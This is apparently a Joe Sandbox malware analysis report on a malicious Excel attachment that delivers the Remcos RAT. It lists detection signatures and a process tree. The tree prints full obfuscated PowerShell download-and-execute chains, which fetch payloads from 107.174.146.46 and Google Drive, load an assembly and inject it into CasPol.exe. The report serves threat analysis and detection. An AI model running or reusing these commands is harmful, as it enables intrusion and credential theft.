Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A & C Metrology OC 545714677889Materiale.xls

Overview

General Information

Sample name:A & C Metrology OC 545714677889Materiale.xls
Analysis ID:1545826
MD5:3d240803d6a9ad22dcc9d51d15c89279
SHA1:5f93ce2e9216c89d155ec35b60dc2aae2f618bbd
SHA256:d4d28af1f5d5e72ff66ae165e2d232764bc88f7dfdd380cce3b5c7a593fd9e40
Infos:

Detection

Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3460 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3720 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3820 cmdline: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 4068 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 4076 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3196 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
              • CasPol.exe (PID: 2756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1356 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1668 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2004 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • mshta.exe (PID: 3004 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1536 cmdline: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 2220 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3676 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3812 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly 